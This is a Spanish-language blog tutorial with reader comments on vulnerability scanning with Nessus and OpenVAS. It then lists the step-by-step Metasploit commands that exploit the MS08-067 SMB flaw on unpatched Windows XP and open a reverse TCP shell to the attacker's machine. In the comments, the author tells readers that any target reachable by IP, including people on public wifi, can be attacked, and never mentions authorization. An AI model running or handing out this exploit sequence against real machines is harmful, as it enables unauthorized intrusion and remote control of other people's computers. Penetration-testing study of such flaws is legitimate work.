En esta nueva clase, vamos a hacer un escaneo usando Nessus y Openvas, configurados en el video anterior.

openvas

Una vez que entendamos como buscar vulnerabilidades vamos a ver un ejemplo de como hackear un windows xp, que a propósito no tiene actualizaciones para comprobar lo simple que puede ser hackear un equipo sin tener los parches de seguridad. La herramienta que vamos usar es Metasploit framework 2, que viene con backtrack 5.1.
Metasploit: es una herramienta para hacer test de penetracion de sistemas. El proyecto metasploit framework, se ha transformado casi en indispensable, y tiene un desarrollo constante.
Inicialmente se desarrollo en Perl pero actualmente se ha programado en ruby. Algo muy bueno es que es open source, por lo que se puede modificar a gusto y claro esta es gratis.

Guía del video, uso de metasploit:

  • cd /pentest/exploits/framework2/
  • Ejecutar: # msfconsole
  • use exploit/windows/smb/ms08_netapi
  • show options
  • set RHOST ipobjetivo
  • show options
  • set PAYLOAD windows/shell/reverse_tcp
  • show options
  • set LHOST myip
  • show options
  • exploit

12 Comentarios

  1. Excelente los videos, y bueno al parecer con W7 es distinto, espero tu actualizacion pronto, gracias. Muy buenos videos explicados en español.

  2. Bueno he seguido todos los tutoriales y en este último me surge una duda, he intentado hacer esto con xp con service pack3 pero me sale el error de que la secion no ha sido creada, (segun lo que he leido es que el sp3 trae un parche para este tipo de ataques, mi pregunta es hay alguna forma de hacerlo con sp3 o windows 7, me gustaria que subieras algun video de como hacerlo gracias.

    PD: es el primer sitio que me encuentro explicando esto de manera simple, clara y en español. gente como tu hace falta en la red para que nosotros los novatos podamos aprender a protejernos.

    saludos.

    • El ataque que se muestra es por no estar actualizado, si atacas un sistema que tiene todos los parches hay que buscar otras vulnerabilidades, para saber si tiene hay que escanear el objetivo, no siempre vas a poder entrar el todos los sistemas, para windows 7 hay exploit, voy a ampliar información en la próxima entrega.
      Saludo

  3. hola que tal amigos me interso mucho este tema de backtrack5 yo he usado las herramientas para desifrar claves wep pero eh visto el video y me ha encantado me gustaria aprender a raiz de eso quisiera hacerles algunas preguntas ruego me sean respondidas tengo algunas dudas como por ejemplo : se lo puede hacer desde un pais a otro…… y a computadoras que se conectan en lugares wifi publicos es posible espero su pronta respuesta gracias

    • Si tenes la ip del objetivo no importa donde este, podes analizarlo y si tiene alguna vulnerabilidad explotarla con metasploit. Si te conectas a una wifi pública es lo mismo, es más como estas en la misma red va a ser más rápido. Saludo

      • muchisisismas gracias mi amigo gente como tu se quiere oye disculpa mi ignoracia pero tengo algunas otras preguntitas espero y no te molesten: Eh seguido paso a paso todo lo que dice pero tengo problemas pues mira yo eh configurado el openvas como en el video pero al intentar aplicar el openvasmd –rebuild me responde con un aborted ademas no entra con la contrase;a y usuario que pongo me sale login failed….bueno aunq creo q no sea tan importante ya q me eh saltado esos pasos y nose si para windows vista es los mismos directorios pero lo intente con los que estan en el video y me sale lo siguiente exploit exeption no matching target espero me ayuden y gracias de antemano

        • mmm, si seguis los pasos no deberías tener problema, pero voy a subir el manual escrito para que sea más claro, por las dudas primero crea el usuario mira bien en el video, y chequea los caracteres — doble guión.
          Saludo

Deja un comentario